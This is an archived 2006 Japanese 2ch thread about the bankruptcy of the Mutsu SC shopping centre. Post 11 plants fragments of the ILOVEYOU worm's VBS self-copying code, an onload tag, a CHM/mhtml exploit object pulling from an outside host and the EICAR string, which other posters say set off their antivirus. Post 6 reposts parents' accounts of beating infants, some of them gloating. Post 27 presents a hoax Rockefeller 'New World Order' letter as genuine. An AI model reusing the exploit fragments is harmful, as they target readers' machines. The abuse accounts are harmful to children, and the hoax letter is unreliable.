5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

なぜ?むつSCは倒産したか???

1 :名無しさん@あたっかー:2006/08/14(月) 21:25:42
昨年9月むつSCが約42億円の負債で倒産した。
社長がアホな管理者に経営を任せたためか?社員が無能なのか?
未だ2百数十名の半数は就職先が決まってない。

2 :名無しさん@あたっかー:2006/08/15(火) 05:37:34
氏ね、管理人

自分だけくだらねえスレ立てやがって


3 :名無しさん@あたっかー:2006/08/15(火) 06:16:19
>>1
むつSCとは、3セクなのか!?

4 :名無しさん@あたっかー:2006/08/15(火) 08:04:50
>>2
まぁまぁ

5 :名無しさん@あたっかー:2006/08/15(火) 11:08:32
すみません、

↓のスレを削除してください。

頭の悪い人間の集まる板は此処でつか?
http://money4.2ch.net/test/read.cgi/manage/1155298393/l50


6 :名無しさん@あたっかー:2006/08/15(火) 11:56:21
育児板【独りで】虐待をやめたいと思う人 5【悩むな】
http://life7.2ch.net/test/read.cgi/baby/1151998845/

21 名前:名無しの心子知らず[sage] 投稿日:2006/07/06(木) 17:15:49 ID:C9eIZrXF
さっき、オムツ替えてる時に吐いたりしたからイライラが一気に爆発してかなり強くお尻と太ももの後ろ側を叩きました
ベビは物凄く泣いて真っ赤になって声が擦れて出にくいのに、泣きまくっています。
それに、またイライラして頬を力任せにつねりました。ベビは泣きまずにずっといます。

28 名前:可愛い奥様[sage] 投稿日:2006/07/06(木) 19:26:34 ID:ZMKP+FEy
毎日一緒にいると疲れてイライラしてひどい罵声とともに叩いてしまう。
外では優しいいいお母さんのところに生まれて幸せだね、何て息子に声をかけてくれる人がたくさんいる。
でもそれは外だけ、私は鬼母です。最近は息子はおびえています。さっきも頬が真っ赤になるまで叩いてしまった。

32 すぐカンシャクを起こし、ごはんを食べない一歳二ヶ月の赤を怒鳴りながらビンタしてしまいました。

61 赤のほっぺをつねってバタバタもがきながら泣いてる姿を見たら楽しくてスカッとした。
お尻もつねって青く腫れた。腫れた赤のお尻をまた指で弾く。
ギャン泣き通り越してひきつけ起こすかってくらい絶叫泣き。このまま、ひきつけ起こしてほしいよ。

78 赤は、叩いたりつねったりしたり眠らせなかったのでひきつけ?みたいな(過呼吸みたいなの)を起こし、
唇が紫っぽくなり顔が青白くなったので一時預かってもらえました。今は赤と離れてホッとしています。

149 夜旦那が仕事でいない間気持ちのコントロール出来ないで子供を蹴ったり殴ったりしてしまいます。

276 まだ産まれて12日目なのにイライラして叩いてスッキリしてしまった。あたしは心の病気?それとも育児疲れ?

既婚女性板【心の】旦那には絶対言えない過去【奥に】
http://human5.2ch.net/test/read.cgi/ms/1154259322/
・援、風呂、整形、堕胎。言ってない   ・経験人数40人以上
・中学の頃円光・整形・家出・乱交やりまくり・風俗・家庭内暴力  他多数

7 :名無しさん@あたっかー:2006/08/15(火) 12:26:14
http://www.toonippo.co.jp/news_too/nto2005/0920/nto0920_8.asp

http://www.toonippo.co.jp/news_too/nto2006/0720/nto0720_5.asp

8 :名無しさん@あたっかー:2006/08/15(火) 12:34:26
>>7
このスレが立った瞬間に検索したお!!!!違うのないんカーーーーーーーーーーーーーーーーwwwwwwwwwwwwwwwwwwwwwww

9 :名無しさん@あたっかー:2006/08/15(火) 13:28:43
ハイハイ。
管理人乙。

10 :名無しさん@あたっかー:2006/08/15(火) 13:37:44
管理人になりたいな。

11 :名無しさん@あたっかー:2006/08/15(火) 14:16:31
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!

http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"


12 :名無しさん@あたっかー:2006/08/15(火) 15:33:16
ノートンが反応するぞ
削除依頼出せ

13 :名無しさん@あたっかー:2006/08/15(火) 15:43:52
>>12
やっぱそうだったのか?さっきノートン先生が煩かったよ

14 :名無しさん@あたっかー:2006/08/16(水) 06:17:52
            , '´  ̄ ̄ ` 、
          i r-ー-┬-‐、i
           | |,,_   _,{|     >>1
          N| "゚'` {"゚`lリ     俺とやらないか
             ト.i   ,__''_  !
          /i/ l\ ー .イ|、
    ,.、-  ̄/  | l   ̄ / | |` ┬-、
    /  ヽ. /    ト-` 、ノ- |  l  l  ヽ.
  /    ∨     l   |!  |   `> |  i
  /     |`二^>  l.  |  | <__,|  |
_|      |.|-<    \ i / ,イ____!/ \
  .|     {.|  ` - 、 ,.---ァ^! |deo | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄l
__{   ___|└―ー/  ̄´ |ヽ |___ノ____________|
  }/ -= ヽ__ - 'ヽ   -‐ ,r'゙   l                  |
__f゙// ̄ ̄     _ -'     |_____ ,. -  ̄ \____|
  | |  -  ̄   /   |     _ | ̄ ̄ ̄ ̄ /       \  ̄|
___`\ __ /    _l - ̄  l___ /   , /     ヽi___.|
 ̄ ̄ ̄    |    _ 二 =〒  ̄  } ̄ /     l |      ! ̄ ̄|
_______l     ξ-ヾ ̄ ξ  l/         l|       |___|
       / プーン 〜 ((゚ニ⊃ 〜
              ξ 人  ξ モワ〜


15 :名無しさん@あたっかー:2006/08/16(水) 11:41:01
経営能無いヤツに社長が経営をまかせるからだ。
むつSCアークスプラザなんてその典型的な例だ。ダイエーと
FC契約結んでも頭悪いからノウハウ活かしきれない極悪的なパターン。
さらに会社更生法適用になったダイエーのマニュアルをそのまま使おうとする
元むつSC○○専務の頭の悪さ!

16 :名無しさん@あたっかー:2006/08/16(水) 12:43:43
しかし何故ダイエーだったのか?
有力GMSをキーテナントで呼べば良かったのにな

まっ、どこのリーシング会社も相手にしてくれなかったんだろうがね。

17 :名無しさん@あたっかー:2006/08/16(水) 13:03:47
┌──────────────────────―─―┐
│□ ■2ch BBS ..− Microsoft Internet Explorer    囗曰区||
├───────────────────────┬─┤
│ファイル(F) 編集(E) 表示(V) お気に入り(A) モナー(∀)   |::田|
├────────────────┬──────┴─┤
| ←     →     ×     圍    合  |   Q          》|
| 戻る   進む   中止  更新  ホーム |  検索          |
├────┬───────────┴──┬─┬───┤
│アド レス(D) | □http://www.2ch.net/2ch.html  |▼|⇒移動|
├────┴───┬┬─────────┴─┴──┬┤
│                ├┤                      ├┤
|2ちゃんねる    ||                      ||
│2chの入り口    ||                      ||
│2ch総合案内┌───────────────────────┐
│        | 2ch                                 |
│        ├───────────────────────┤
│おすすめ   | >>1は不正な処理を行いました。    ...┌───┐   |
│モナー    | 残念ですが>>1の人生を.         .| 終了 |   |
│        | 終了させてあげて下さい。(推奨)    ...└───┘   |
│        |                                  |
│        └───────────────────────┘
│特別企画        ├┤                      ├┤
├┬──────┬┼┼┬────────────┬┼┤
├┴──────┴┴┴┴──┬─┬─┬─────┴┴┤
│□ エラーが発生しました    |  |  |●インターネット |
└─────────────┴─┴─┴───────┘


18 :名無しさん@あたっかー:2006/08/16(水) 13:08:25
http://chinpo4545omanko1919.gooside.com/index.html

19 :名無しさん@あたっかー:2006/08/19(土) 15:36:04
>>16
正解!!

20 :名無しさん@あたっかー:2006/08/19(土) 16:46:22
>>17
そのAAいぃね。

貰うね。。

21 :名無しさん@あたっかー:2006/08/19(土) 19:52:35
いいよ どうせパクりものだし

22 :名無しさん@あたっかー:2006/08/23(水) 23:20:07
おむつ専門店

23 :名無しさん@あたっかー:2006/08/25(金) 20:48:43
現在はSCの閉鎖が多すぎるよな。

24 :名無しさん@あたっかー:2006/10/01(日) 01:03:18
むつ市民は、マエダか下田、青森、八戸までお買い物に行きます

25 :名無しさん@あたっかー:2006/10/24(火) 21:55:55
>>24
いいえ私はネットで買い物しています。

26 :名無しさん@あたっかー:2006/10/25(水) 18:43:23
時代は路面店だよ・・・

若いギャルがSCなんかで買い物しません

27 :名無しさん@あたっかー:2006/10/25(水) 18:50:08
http://www.hiddenmysteries.org/news/asia/japan/041002a.html
終末の始まり 国連総会へのロックフェラーの手紙
re: 新世界秩序、即時的アジェンダ 
From:ロックフェラー・グローバル・コミュニケーションズ 国連総会宛
終末の時が近づいている。好むと好まざるとに拘わらず、それは我々すべてが直面せざるを得ない運命である。
二〇〇一年、九月十一日、世界は終末の目撃者であった。我々が見、経験したものは、まもなく明るみに出るはずの大災害には、比ぶべくもないだろう。
非常に多くの生命が失われてきた、しかもなお、それ以上に多くの生命が失われるだろう、と言われている―この古い体制が崩壊し始めるに応じて、
これらのことがらは起こり続けるだろう。今存在している、あるいは古代からある人間の政府は、決してひとつも完全な支配は維持出来なかった。
いかなる政府も失敗してきたし、失敗するだろう。
 
政府はあなたを保護出来ない。政府は人々が真実に自由な場所、あなたの近隣の人があなたの家族であり、
見知らぬ人たちがあなたの友だちであると言う場所、を与えることができない。
いかなる人間の今日の政府も、これを達成することができないし、しないだろう。
これが、アジェンダが設定された理由である。それは、ずっと昔から、アルマゲドンとして言及されてきた。
しかし、怖れないようにしなさい。それは核によるホロコースト、あるいは我々の文化を平坦にするだろう天からの迷った小惑星ではないだろう。
実際、それは災厄を起こし、一掃する惑星ではないだろう。

新しいシステムが来つつある。ただ一つの質問は:あなたがそこにいることを選ぶか?それとも、
自己破壊への道を降りて行き続けるか?、と言うことだ。以下のアジェンダは避けることができない、
そして、生き延びるため、それを得るために、ずっと我慢する必要があるだろう。それ故、よくよく考えなさい。
それは、あなたの未来である。そして、あなたたちすべては、それをうまくやれるだろう。





12 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)